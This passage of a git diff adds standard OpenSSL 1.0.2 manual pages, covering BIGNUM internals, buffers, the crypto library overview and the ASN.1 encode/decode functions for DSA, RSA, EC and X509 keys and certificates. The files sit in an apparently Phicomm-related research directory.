+ void bn_dump(BN_ULONG *d, int n);
+ void bn_set_max(BIGNUM *a);
+ void bn_set_high(BIGNUM *r, BIGNUM *a, int n);
+ void bn_set_low(BIGNUM *r, BIGNUM *a, int n);
+
+=head1 DESCRIPTION
+
+This page documents the internal functions used by the OpenSSL
+B<BIGNUM> implementation. They are described here to facilitate
+debugging and extending the library. They are I<not> to be used by
+applications.
+
+=head2 The BIGNUM structure
+
+ typedef struct bignum_st BIGNUM;
+
+ struct bignum_st
+        {
+        BN_ULONG *d;    /* Pointer to an array of 'BN_BITS2' bit chunks. */
+        int top;        /* Index of last used d +1. */
+        /* The next are internal book keeping for bn_expand. */
+        int dmax;       /* Size of the d array. */
+        int neg;        /* one if the number is negative */
+        int flags;
+        };
+
+
+The integer value is stored in B<d>, a malloc()ed array of words (B<BN_ULONG>),
+least significant word first. A B<BN_ULONG> can be either 16, 32 or 64 bits
+in size, depending on the 'number of bits' (B<BITS2>) specified in
+C<openssl/bn.h>.
+
+B<dmax> is the size of the B<d> array that has been allocated.  B<top>
+is the number of words being used, so for a value of 4, bn.d[0]=4 and
+bn.top=1.  B<neg> is 1 if the number is negative.  When a B<BIGNUM> is
+B<0>, the B<d> field can be B<NULL> and B<top> == B<0>.
+
+B<flags> is a bit field of flags which are defined in C<openssl/bn.h>. The 
+flags begin with B<BN_FLG_>. The macros BN_set_flags(b,n) and 
+BN_get_flags(b,n) exist to enable or fetch flag(s) B<n> from B<BIGNUM>
+structure B<b>.
+
+Various routines in this library require the use of temporary
+B<BIGNUM> variables during their execution.  Since dynamic memory
+allocation to create B<BIGNUM>s is rather expensive when used in
+conjunction with repeated subroutine calls, the B<BN_CTX> structure is
+used.  This structure contains B<BN_CTX_NUM> B<BIGNUM>s, see
+L<BN_CTX_start(3)|BN_CTX_start(3)>.
+
+=head2 Low-level arithmetic operations
+
+These functions are implemented in C and for several platforms in
+assembly language:
+
+bn_mul_words(B<rp>, B<ap>, B<num>, B<w>) operates on the B<num> word
+arrays B<rp> and B<ap>.  It computes B<ap> * B<w>, places the result
+in B<rp>, and returns the high word (carry).
+
+bn_mul_add_words(B<rp>, B<ap>, B<num>, B<w>) operates on the B<num>
+word arrays B<rp> and B<ap>.  It computes B<ap> * B<w> + B<rp>, places
+the result in B<rp>, and returns the high word (carry).
+
+bn_sqr_words(B<rp>, B<ap>, B<n>) operates on the B<num> word array
+B<ap> and the 2*B<num> word array B<ap>.  It computes B<ap> * B<ap>
+word-wise, and places the low and high bytes of the result in B<rp>.
+
+bn_div_words(B<h>, B<l>, B<d>) divides the two word number (B<h>,B<l>)
+by B<d> and returns the result.
+
+bn_add_words(B<rp>, B<ap>, B<bp>, B<num>) operates on the B<num> word
+arrays B<ap>, B<bp> and B<rp>.  It computes B<ap> + B<bp>, places the
+result in B<rp>, and returns the high word (carry).
+
+bn_sub_words(B<rp>, B<ap>, B<bp>, B<num>) operates on the B<num> word
+arrays B<ap>, B<bp> and B<rp>.  It computes B<ap> - B<bp>, places the
+result in B<rp>, and returns the carry (1 if B<bp> E<gt> B<ap>, 0
+otherwise).
+
+bn_mul_comba4(B<r>, B<a>, B<b>) operates on the 4 word arrays B<a> and
+B<b> and the 8 word array B<r>.  It computes B<a>*B<b> and places the
+result in B<r>.
+
+bn_mul_comba8(B<r>, B<a>, B<b>) operates on the 8 word arrays B<a> and
+B<b> and the 16 word array B<r>.  It computes B<a>*B<b> and places the
+result in B<r>.
+
+bn_sqr_comba4(B<r>, B<a>, B<b>) operates on the 4 word arrays B<a> and
+B<b> and the 8 word array B<r>.
+
+bn_sqr_comba8(B<r>, B<a>, B<b>) operates on the 8 word arrays B<a> and
+B<b> and the 16 word array B<r>.
+
+The following functions are implemented in C:
+
+bn_cmp_words(B<a>, B<b>, B<n>) operates on the B<n> word arrays B<a>
+and B<b>.  It returns 1, 0 and -1 if B<a> is greater than, equal and
+less than B<b>.
+
+bn_mul_normal(B<r>, B<a>, B<na>, B<b>, B<nb>) operates on the B<na>
+word array B<a>, the B<nb> word array B<b> and the B<na>+B<nb> word
+array B<r>.  It computes B<a>*B<b> and places the result in B<r>.
+
+bn_mul_low_normal(B<r>, B<a>, B<b>, B<n>) operates on the B<n> word
+arrays B<r>, B<a> and B<b>.  It computes the B<n> low words of
+B<a>*B<b> and places the result in B<r>.
+
+bn_mul_recursive(B<r>, B<a>, B<b>, B<n2>, B<dna>, B<dnb>, B<t>) operates
+on the word arrays B<a> and B<b> of length B<n2>+B<dna> and B<n2>+B<dnb>
+(B<dna> and B<dnb> are currently allowed to be 0 or negative) and the 2*B<n2>
+word arrays B<r> and B<t>.  B<n2> must be a power of 2.  It computes
+B<a>*B<b> and places the result in B<r>.
+
+bn_mul_part_recursive(B<r>, B<a>, B<b>, B<n>, B<tna>, B<tnb>, B<tmp>)
+operates on the word arrays B<a> and B<b> of length B<n>+B<tna> and
+B<n>+B<tnb> and the 4*B<n> word arrays B<r> and B<tmp>.
+
+bn_mul_low_recursive(B<r>, B<a>, B<b>, B<n2>, B<tmp>) operates on the
+B<n2> word arrays B<r> and B<tmp> and the B<n2>/2 word arrays B<a>
+and B<b>.
+
+bn_mul_high(B<r>, B<a>, B<b>, B<l>, B<n2>, B<tmp>) operates on the
+B<n2> word arrays B<r>, B<a>, B<b> and B<l> (?) and the 3*B<n2> word
+array B<tmp>.
+
+BN_mul() calls bn_mul_normal(), or an optimized implementation if the
+factors have the same size: bn_mul_comba8() is used if they are 8
+words long, bn_mul_recursive() if they are larger than
+B<BN_MULL_SIZE_NORMAL> and the size is an exact multiple of the word
+size, and bn_mul_part_recursive() for others that are larger than
+B<BN_MULL_SIZE_NORMAL>.
+
+bn_sqr_normal(B<r>, B<a>, B<n>, B<tmp>) operates on the B<n> word array
+B<a> and the 2*B<n> word arrays B<tmp> and B<r>.
+
+The implementations use the following macros which, depending on the
+architecture, may use "long long" C operations or inline assembler.
+They are defined in C<bn_lcl.h>.
+
+mul(B<r>, B<a>, B<w>, B<c>) computes B<w>*B<a>+B<c> and places the
+low word of the result in B<r> and the high word in B<c>.
+
+mul_add(B<r>, B<a>, B<w>, B<c>) computes B<w>*B<a>+B<r>+B<c> and
+places the low word of the result in B<r> and the high word in B<c>.
+
+sqr(B<r0>, B<r1>, B<a>) computes B<a>*B<a> and places the low word
+of the result in B<r0> and the high word in B<r1>.
+
+=head2 Size changes
+
+bn_expand() ensures that B<b> has enough space for a B<bits> bit
+number.  bn_wexpand() ensures that B<b> has enough space for an
+B<n> word number.  If the number has to be expanded, both macros
+call bn_expand2(), which allocates a new B<d> array and copies the
+data.  They return B<NULL> on error, B<b> otherwise.
+
+The bn_fix_top() macro reduces B<a-E<gt>top> to point to the most
+significant non-zero word plus one when B<a> has shrunk.
+
+=head2 Debugging
+
+bn_check_top() verifies that C<((a)-E<gt>top E<gt>= 0 && (a)-E<gt>top
+E<lt>= (a)-E<gt>dmax)>.  A violation will cause the program to abort.
+
+bn_print() prints B<a> to stderr. bn_dump() prints B<n> words at B<d>
+(in reverse order, i.e. most significant word first) to stderr.
+
+bn_set_max() makes B<a> a static number with a B<dmax> of its current size.
+This is used by bn_set_low() and bn_set_high() to make B<r> a read-only
+B<BIGNUM> that contains the B<n> low or high words of B<a>.
+
+If B<BN_DEBUG> is not defined, bn_check_top(), bn_print(), bn_dump()
+and bn_set_max() are defined as empty macros.
+
+=head1 SEE ALSO
+
+L<bn(3)|bn(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/buffer.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/buffer.pod
new file mode 100644
index 0000000..781f5b1
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/buffer.pod
@@ -0,0 +1,73 @@
+=pod
+
+=head1 NAME
+
+BUF_MEM_new, BUF_MEM_free, BUF_MEM_grow, BUF_strdup - simple
+character arrays structure
+
+=head1 SYNOPSIS
+
+ #include <openssl/buffer.h>
+
+ BUF_MEM *BUF_MEM_new(void);
+
+ void	BUF_MEM_free(BUF_MEM *a);
+
+ int	BUF_MEM_grow(BUF_MEM *str, int len);
+
+ char *	BUF_strdup(const char *str);
+
+=head1 DESCRIPTION
+
+The buffer library handles simple character arrays. Buffers are used for
+various purposes in the library, most notably memory BIOs.
+
+The library uses the BUF_MEM structure defined in buffer.h:
+
+ typedef struct buf_mem_st
+ {
+        int length;     /* current number of bytes */
+        char *data;
+        int max;        /* size of buffer */
+ } BUF_MEM;
+
+B<length> is the current size of the buffer in bytes, B<max> is the amount of
+memory allocated to the buffer. There are three functions which handle these
+and one "miscellaneous" function.
+
+BUF_MEM_new() allocates a new buffer of zero size.
+
+BUF_MEM_free() frees up an already existing buffer. The data is zeroed
+before freeing up in case the buffer contains sensitive data.
+
+BUF_MEM_grow() changes the size of an already existing buffer to
+B<len>. Any data already in the buffer is preserved if it increases in
+size.
+
+BUF_strdup() copies a null terminated string into a block of allocated
+memory and returns a pointer to the allocated block.
+Unlike the standard C library strdup() this function uses OPENSSL_malloc() and so
+should be used in preference to the standard library strdup() because it can
+be used for memory leak checking or replacing the malloc() function.
+
+The memory allocated from BUF_strdup() should be freed up using the OPENSSL_free()
+function.
+
+=head1 RETURN VALUES
+
+BUF_MEM_new() returns the buffer or NULL on error.
+
+BUF_MEM_free() has no return value.
+
+BUF_MEM_grow() returns zero on error or the new size (i.e. B<len>).
+
+=head1 SEE ALSO
+
+L<bio(3)|bio(3)>
+
+=head1 HISTORY
+
+BUF_MEM_new(), BUF_MEM_free() and BUF_MEM_grow() are available in all
+versions of SSLeay and OpenSSL. BUF_strdup() was added in SSLeay 0.8.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/crypto.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/crypto.pod
new file mode 100644
index 0000000..f18edfe
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/crypto.pod
@@ -0,0 +1,85 @@
+=pod
+
+=head1 NAME
+
+crypto - OpenSSL cryptographic library
+
+=head1 SYNOPSIS
+
+=head1 DESCRIPTION
+
+The OpenSSL B<crypto> library implements a wide range of cryptographic
+algorithms used in various Internet standards. The services provided
+by this library are used by the OpenSSL implementations of SSL, TLS
+and S/MIME, and they have also been used to implement SSH, OpenPGP, and
+other cryptographic standards.
+
+=head1 OVERVIEW
+
+B<libcrypto> consists of a number of sub-libraries that implement the
+individual algorithms.
+
+The functionality includes symmetric encryption, public key
+cryptography and key agreement, certificate handling, cryptographic
+hash functions and a cryptographic pseudo-random number generator.
+
+=over 4
+
+=item SYMMETRIC CIPHERS
+
+L<blowfish(3)|blowfish(3)>, L<cast(3)|cast(3)>, L<des(3)|des(3)>,
+L<idea(3)|idea(3)>, L<rc2(3)|rc2(3)>, L<rc4(3)|rc4(3)>, L<rc5(3)|rc5(3)> 
+
+=item PUBLIC KEY CRYPTOGRAPHY AND KEY AGREEMENT
+
+L<dsa(3)|dsa(3)>, L<dh(3)|dh(3)>, L<rsa(3)|rsa(3)>
+
+=item CERTIFICATES
+
+L<x509(3)|x509(3)>, L<x509v3(3)|x509v3(3)>
+
+=item AUTHENTICATION CODES, HASH FUNCTIONS
+
+L<hmac(3)|hmac(3)>, L<md2(3)|md2(3)>, L<md4(3)|md4(3)>,
+L<md5(3)|md5(3)>, L<mdc2(3)|mdc2(3)>, L<ripemd(3)|ripemd(3)>,
+L<sha(3)|sha(3)>
+
+=item AUXILIARY FUNCTIONS
+
+L<err(3)|err(3)>, L<threads(3)|threads(3)>, L<rand(3)|rand(3)>,
+L<OPENSSL_VERSION_NUMBER(3)|OPENSSL_VERSION_NUMBER(3)>
+
+=item INPUT/OUTPUT, DATA ENCODING
+
+L<asn1(3)|asn1(3)>, L<bio(3)|bio(3)>, L<evp(3)|evp(3)>, L<pem(3)|pem(3)>,
+L<pkcs7(3)|pkcs7(3)>, L<pkcs12(3)|pkcs12(3)> 
+
+=item INTERNAL FUNCTIONS
+
+L<bn(3)|bn(3)>, L<buffer(3)|buffer(3)>, L<ec(3)|ec(3)>, L<lhash(3)|lhash(3)>,
+L<objects(3)|objects(3)>, L<stack(3)|stack(3)>,
+L<txt_db(3)|txt_db(3)> 
+
+=back
+
+=head1 NOTES
+
+Some of the newer functions follow a naming convention using the numbers
+B<0> and B<1>. For example the functions:
+
+ int X509_CRL_add0_revoked(X509_CRL *crl, X509_REVOKED *rev);
+ int X509_add1_trust_object(X509 *x, ASN1_OBJECT *obj);
+
+The B<0> version uses the supplied structure pointer directly
+in the parent and it will be freed up when the parent is freed.
+In the above example B<crl> would be freed but B<rev> would not.
+
+The B<1> function uses a copy of the supplied structure pointer
+(or in some cases increases its link count) in the parent and
+so both (B<x> and B<obj> above) should be freed up.
+
+=head1 SEE ALSO
+
+L<openssl(1)|openssl(1)>, L<ssl(3)|ssl(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/d2i_ASN1_OBJECT.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/d2i_ASN1_OBJECT.pod
new file mode 100644
index 0000000..45bb184
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/d2i_ASN1_OBJECT.pod
@@ -0,0 +1,29 @@
+=pod
+
+=head1 NAME
+
+d2i_ASN1_OBJECT, i2d_ASN1_OBJECT - ASN1 OBJECT IDENTIFIER functions
+
+=head1 SYNOPSIS
+
+ #include <openssl/objects.h>
+
+ ASN1_OBJECT *d2i_ASN1_OBJECT(ASN1_OBJECT **a, unsigned char **pp, long length);
+ int i2d_ASN1_OBJECT(ASN1_OBJECT *a, unsigned char **pp);
+
+=head1 DESCRIPTION
+
+These functions decode and encode an ASN1 OBJECT IDENTIFIER.
+
+Othewise these behave in a similar way to d2i_X509() and i2d_X509()
+described in the L<d2i_X509(3)|d2i_X509(3)> manual page.
+
+=head1 SEE ALSO
+
+L<d2i_X509(3)|d2i_X509(3)>
+
+=head1 HISTORY
+
+TBA
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/d2i_DHparams.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/d2i_DHparams.pod
new file mode 100644
index 0000000..1e98aeb
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/d2i_DHparams.pod
@@ -0,0 +1,30 @@
+=pod
+
+=head1 NAME
+
+d2i_DHparams, i2d_DHparams - PKCS#3 DH parameter functions.
+
+=head1 SYNOPSIS
+
+ #include <openssl/dh.h>
+
+ DH *d2i_DHparams(DH **a, unsigned char **pp, long length);
+ int i2d_DHparams(DH *a, unsigned char **pp);
+
+=head1 DESCRIPTION
+
+These functions decode and encode PKCS#3 DH parameters using the
+DHparameter structure described in PKCS#3.
+
+Othewise these behave in a similar way to d2i_X509() and i2d_X509()
+described in the L<d2i_X509(3)|d2i_X509(3)> manual page.
+
+=head1 SEE ALSO
+
+L<d2i_X509(3)|d2i_X509(3)>
+
+=head1 HISTORY
+
+TBA
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/d2i_DSAPublicKey.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/d2i_DSAPublicKey.pod
new file mode 100644
index 0000000..e999376
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/d2i_DSAPublicKey.pod
@@ -0,0 +1,83 @@
+=pod
+
+=head1 NAME
+
+d2i_DSAPublicKey, i2d_DSAPublicKey, d2i_DSAPrivateKey, i2d_DSAPrivateKey,
+d2i_DSA_PUBKEY, i2d_DSA_PUBKEY, d2i_DSAparams, i2d_DSAparams, d2i_DSA_SIG, i2d_DSA_SIG - DSA key encoding
+and parsing functions.
+
+=head1 SYNOPSIS
+
+ #include <openssl/dsa.h>
+ #include <openssl/x509.h>
+
+ DSA * d2i_DSAPublicKey(DSA **a, const unsigned char **pp, long length);
+
+ int i2d_DSAPublicKey(const DSA *a, unsigned char **pp);
+
+ DSA * d2i_DSA_PUBKEY(DSA **a, const unsigned char **pp, long length);
+
+ int i2d_DSA_PUBKEY(const DSA *a, unsigned char **pp);
+
+ DSA * d2i_DSAPrivateKey(DSA **a, const unsigned char **pp, long length);
+
+ int i2d_DSAPrivateKey(const DSA *a, unsigned char **pp);
+
+ DSA * d2i_DSAparams(DSA **a, const unsigned char **pp, long length);
+
+ int i2d_DSAparams(const DSA *a, unsigned char **pp);
+
+ DSA * d2i_DSA_SIG(DSA_SIG **a, const unsigned char **pp, long length);
+
+ int i2d_DSA_SIG(const DSA_SIG *a, unsigned char **pp);
+
+=head1 DESCRIPTION
+
+d2i_DSAPublicKey() and i2d_DSAPublicKey() decode and encode the DSA public key
+components structure.
+
+d2i_DSA_PUBKEY() and i2d_DSA_PUBKEY() decode and encode an DSA public key using
+a SubjectPublicKeyInfo (certificate public key) structure.
+
+d2i_DSAPrivateKey(), i2d_DSAPrivateKey() decode and encode the DSA private key
+components.
+
+d2i_DSAparams(), i2d_DSAparams() decode and encode the DSA parameters using
+a B<Dss-Parms> structure as defined in RFC2459.
+
+d2i_DSA_SIG(), i2d_DSA_SIG() decode and encode a DSA signature using a
+B<Dss-Sig-Value> structure as defined in RFC2459.
+
+The usage of all of these functions is similar to the d2i_X509() and
+i2d_X509() described in the L<d2i_X509(3)|d2i_X509(3)> manual page.
+
+=head1 NOTES
+
+The B<DSA> structure passed to the private key encoding functions should have
+all the private key components present.
+
+The data encoded by the private key functions is unencrypted and therefore 
+offers no private key security.
+
+The B<DSA_PUBKEY> functions should be used in preference to the B<DSAPublicKey>
+functions when encoding public keys because they use a standard format.
+
+The B<DSAPublicKey> functions use an non standard format the actual data encoded
+depends on the value of the B<write_params> field of the B<a> key parameter.
+If B<write_params> is zero then only the B<pub_key> field is encoded as an
+B<INTEGER>. If B<write_params> is 1 then a B<SEQUENCE> consisting of the
+B<p>, B<q>, B<g> and B<pub_key> respectively fields are encoded.
+
+The B<DSAPrivateKey> functions also use a non standard structure consiting
+consisting of a SEQUENCE containing the B<p>, B<q>, B<g> and B<pub_key> and
+B<priv_key> fields respectively.
+
+=head1 SEE ALSO
+
+L<d2i_X509(3)|d2i_X509(3)>
+
+=head1 HISTORY
+
+TBA
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/d2i_ECPKParameters.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/d2i_ECPKParameters.pod
new file mode 100644
index 0000000..3768c41
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/d2i_ECPKParameters.pod
@@ -0,0 +1,84 @@
+=pod
+
+=head1 NAME
+
+d2i_ECPKParameters, i2d_ECPKParameters, d2i_ECPKParameters_bio, i2d_ECPKParameters_bio, d2i_ECPKParameters_fp, i2d_ECPKParameters_fp(fp,x), ECPKParameters_print, ECPKParameters_print_fp - Functions for decoding and encoding ASN1 representations of elliptic curve entities
+
+=head1 SYNOPSIS
+
+ #include <openssl/ec.h>
+
+ EC_GROUP *d2i_ECPKParameters(EC_GROUP **px, const unsigned char **in, long len);
+ int i2d_ECPKParameters(const EC_GROUP *x, unsigned char **out);
+ #define d2i_ECPKParameters_bio(bp,x) ASN1_d2i_bio_of(EC_GROUP,NULL,d2i_ECPKParameters,bp,x)
+ #define i2d_ECPKParameters_bio(bp,x) ASN1_i2d_bio_of_const(EC_GROUP,i2d_ECPKParameters,bp,x)
+ #define d2i_ECPKParameters_fp(fp,x) (EC_GROUP *)ASN1_d2i_fp(NULL, \
+                (char *(*)())d2i_ECPKParameters,(fp),(unsigned char **)(x))
+ #define i2d_ECPKParameters_fp(fp,x) ASN1_i2d_fp(i2d_ECPKParameters,(fp), \
+		(unsigned char *)(x))
+ int     ECPKParameters_print(BIO *bp, const EC_GROUP *x, int off);
+ int     ECPKParameters_print_fp(FILE *fp, const EC_GROUP *x, int off);
+
+
+=head1 DESCRIPTION
+
+The ECPKParameters encode and decode routines encode and parse the public parameters for an
+B<EC_GROUP> structure, which represents a curve.
+
+d2i_ECPKParameters() attempts to decode B<len> bytes at B<*in>. If 
+successful a pointer to the B<EC_GROUP> structure is returned. If an error
+occurred then B<NULL> is returned. If B<px> is not B<NULL> then the
+returned structure is written to B<*px>. If B<*px> is not B<NULL>
+then it is assumed that B<*px> contains a valid B<EC_GROUP>
+structure and an attempt is made to reuse it. If the call is
+successful B<*in> is incremented to the byte following the
+parsed data.
+
+i2d_ECPKParameters() encodes the structure pointed to by B<x> into DER format.
+If B<out> is not B<NULL> is writes the DER encoded data to the buffer
+at B<*out>, and increments it to point after the data just written.
+If the return value is negative an error occurred, otherwise it
+returns the length of the encoded data. 
+
+If B<*out> is B<NULL> memory will be allocated for a buffer and the encoded
+data written to it. In this case B<*out> is not incremented and it points to
+the start of the data just written.
+
+d2i_ECPKParameters_bio() is similar to d2i_ECPKParameters() except it attempts
+to parse data from BIO B<bp>.
+
+d2i_ECPKParameters_fp() is similar to d2i_ECPKParameters() except it attempts
+to parse data from FILE pointer B<fp>.
+
+i2d_ECPKParameters_bio() is similar to i2d_ECPKParameters() except it writes
+the encoding of the structure B<x> to BIO B<bp> and it
+returns 1 for success and 0 for failure.
+
+i2d_ECPKParameters_fp() is similar to i2d_ECPKParameters() except it writes
+the encoding of the structure B<x> to BIO B<bp> and it
+returns 1 for success and 0 for failure.
+
+These functions are very similar to the X509 functions described in L<d2i_X509(3)|d2i_X509(3)>,
+where further notes and examples are available.
+
+The ECPKParameters_print and ECPKParameters_print_fp functions print a human-readable output
+of the public parameters of the EC_GROUP to B<bp> or B<fp>. The output lines are indented by B<off> spaces.
+
+=head1 RETURN VALUES
+
+d2i_ECPKParameters(), d2i_ECPKParameters_bio() and d2i_ECPKParameters_fp() return a valid B<EC_GROUP> structure
+or B<NULL> if an error occurs.
+
+i2d_ECPKParameters() returns the number of bytes successfully encoded or a negative
+value if an error occurs.
+
+i2d_ECPKParameters_bio(), i2d_ECPKParameters_fp(), ECPKParameters_print and ECPKParameters_print_fp
+return 1 for success and 0 if an error occurs. 
+
+=head1 SEE ALSO
+
+L<crypto(3)|crypto(3)>, L<ec(3)|ec(3)>, L<EC_GROUP_new(3)|EC_GROUP_new(3)>, L<EC_GROUP_copy(3)|EC_GROUP_copy(3)>,
+L<EC_POINT_new(3)|EC_POINT_new(3)>, L<EC_POINT_add(3)|EC_POINT_add(3)>, L<EC_KEY_new(3)|EC_KEY_new(3)>,
+L<EC_GFp_simple_method(3)|EC_GFp_simple_method(3)>, L<d2i_X509(3)|d2i_X509(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/d2i_PKCS8PrivateKey.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/d2i_PKCS8PrivateKey.pod
new file mode 100644
index 0000000..a54b779
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/d2i_PKCS8PrivateKey.pod
@@ -0,0 +1,56 @@
+=pod
+
+=head1 NAME
+
+d2i_PKCS8PrivateKey_bio, d2i_PKCS8PrivateKey_fp,
+i2d_PKCS8PrivateKey_bio, i2d_PKCS8PrivateKey_fp,
+i2d_PKCS8PrivateKey_nid_bio, i2d_PKCS8PrivateKey_nid_fp - PKCS#8 format private key functions
+
+=head1 SYNOPSIS
+
+ #include <openssl/evp.h>
+
+ EVP_PKEY *d2i_PKCS8PrivateKey_bio(BIO *bp, EVP_PKEY **x, pem_password_cb *cb, void *u);
+ EVP_PKEY *d2i_PKCS8PrivateKey_fp(FILE *fp, EVP_PKEY **x, pem_password_cb *cb, void *u);
+
+ int i2d_PKCS8PrivateKey_bio(BIO *bp, EVP_PKEY *x, const EVP_CIPHER *enc,
+				  char *kstr, int klen,
+				  pem_password_cb *cb, void *u);
+
+ int i2d_PKCS8PrivateKey_fp(FILE *fp, EVP_PKEY *x, const EVP_CIPHER *enc,
+				  char *kstr, int klen,
+				  pem_password_cb *cb, void *u);
+
+ int i2d_PKCS8PrivateKey_nid_bio(BIO *bp, EVP_PKEY *x, int nid,
+				  char *kstr, int klen,
+				  pem_password_cb *cb, void *u);
+
+ int i2d_PKCS8PrivateKey_nid_fp(FILE *fp, EVP_PKEY *x, int nid,
+				  char *kstr, int klen,
+				  pem_password_cb *cb, void *u);
+
+=head1 DESCRIPTION
+
+The PKCS#8 functions encode and decode private keys in PKCS#8 format using both
+PKCS#5 v1.5 and PKCS#5 v2.0 password based encryption algorithms.
+
+Other than the use of DER as opposed to PEM these functions are identical to the
+corresponding B<PEM> function as described in the L<pem(3)|pem(3)> manual page.
+
+=head1 NOTES
+
+Before using these functions L<OpenSSL_add_all_algorithms(3)|OpenSSL_add_all_algorithms(3)>
+should be called to initialize the internal algorithm lookup tables otherwise errors about
+unknown algorithms will occur if an attempt is made to decrypt a private key. 
+
+These functions are currently the only way to store encrypted private keys using DER format.
+
+Currently all the functions use BIOs or FILE pointers, there are no functions which
+work directly on memory: this can be readily worked around by converting the buffers
+to memory BIOs, see L<BIO_s_mem(3)|BIO_s_mem(3)> for details.
+
+=head1 SEE ALSO
+
+L<pem(3)|pem(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/d2i_RSAPublicKey.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/d2i_RSAPublicKey.pod
new file mode 100644
index 0000000..aa6078b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/d2i_RSAPublicKey.pod
@@ -0,0 +1,67 @@
+=pod
+
+=head1 NAME
+
+d2i_RSAPublicKey, i2d_RSAPublicKey, d2i_RSAPrivateKey, i2d_RSAPrivateKey,
+d2i_RSA_PUBKEY, i2d_RSA_PUBKEY, i2d_Netscape_RSA,
+d2i_Netscape_RSA - RSA public and private key encoding functions.
+
+=head1 SYNOPSIS
+
+ #include <openssl/rsa.h>
+ #include <openssl/x509.h>
+
+ RSA * d2i_RSAPublicKey(RSA **a, const unsigned char **pp, long length);
+
+ int i2d_RSAPublicKey(RSA *a, unsigned char **pp);
+
+ RSA * d2i_RSA_PUBKEY(RSA **a, const unsigned char **pp, long length);
+
+ int i2d_RSA_PUBKEY(RSA *a, unsigned char **pp);
+
+ RSA * d2i_RSAPrivateKey(RSA **a, const unsigned char **pp, long length);
+
+ int i2d_RSAPrivateKey(RSA *a, unsigned char **pp);
+
+ int i2d_Netscape_RSA(RSA *a, unsigned char **pp, int (*cb)());
+
+ RSA * d2i_Netscape_RSA(RSA **a, const unsigned char **pp, long length, int (*cb)());
+
+=head1 DESCRIPTION
+
+d2i_RSAPublicKey() and i2d_RSAPublicKey() decode and encode a PKCS#1 RSAPublicKey
+structure.
+
+d2i_RSA_PUBKEY() and i2d_RSA_PUBKEY() decode and encode an RSA public key using
+a SubjectPublicKeyInfo (certificate public key) structure.
+
+d2i_RSAPrivateKey(), i2d_RSAPrivateKey() decode and encode a PKCS#1 RSAPrivateKey
+structure.
+
+d2i_Netscape_RSA(), i2d_Netscape_RSA() decode and encode an RSA private key in
+NET format.
+
+The usage of all of these functions is similar to the d2i_X509() and
+i2d_X509() described in the L<d2i_X509(3)|d2i_X509(3)> manual page.
+
+=head1 NOTES
+
+The B<RSA> structure passed to the private key encoding functions should have
+all the PKCS#1 private key components present.
+
+The data encoded by the private key functions is unencrypted and therefore 
+offers no private key security. 
+
+The NET format functions are present to provide compatibility with certain very
+old software. This format has some severe security weaknesses and should be
+avoided if possible.
+
+=head1 SEE ALSO
+
+L<d2i_X509(3)|d2i_X509(3)>
+
+=head1 HISTORY
+
+TBA
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/d2i_X509.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/d2i_X509.pod
new file mode 100644
index 0000000..fea6e86
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/d2i_X509.pod
@@ -0,0 +1,254 @@
+=pod
+
+=head1 NAME
+
+d2i_X509, i2d_X509, d2i_X509_bio, d2i_X509_fp, i2d_X509_bio,
+i2d_X509_fp - X509 encode and decode functions
+
+=head1 SYNOPSIS
+
+ #include <openssl/x509.h>
+
+ X509 *d2i_X509(X509 **px, const unsigned char **in, int len);
+ int i2d_X509(X509 *x, unsigned char **out);
+
+ X509 *d2i_X509_bio(BIO *bp, X509 **x);
+ X509 *d2i_X509_fp(FILE *fp, X509 **x);
+
+ int i2d_X509_bio(BIO *bp, X509 *x);
+ int i2d_X509_fp(FILE *fp, X509 *x);
+
+ int i2d_re_X509_tbs(X509 *x, unsigned char **out);
+
+=head1 DESCRIPTION
+
+The X509 encode and decode routines encode and parse an
+B<X509> structure, which represents an X509 certificate.
+
+d2i_X509() attempts to decode B<len> bytes at B<*in>. If 
+successful a pointer to the B<X509> structure is returned. If an error
+occurred then B<NULL> is returned. If B<px> is not B<NULL> then the
+returned structure is written to B<*px>. If B<*px> is not B<NULL>
+then it is assumed that B<*px> contains a valid B<X509>
+structure and an attempt is made to reuse it. If the call is
+successful B<*in> is incremented to the byte following the
+parsed data.
+
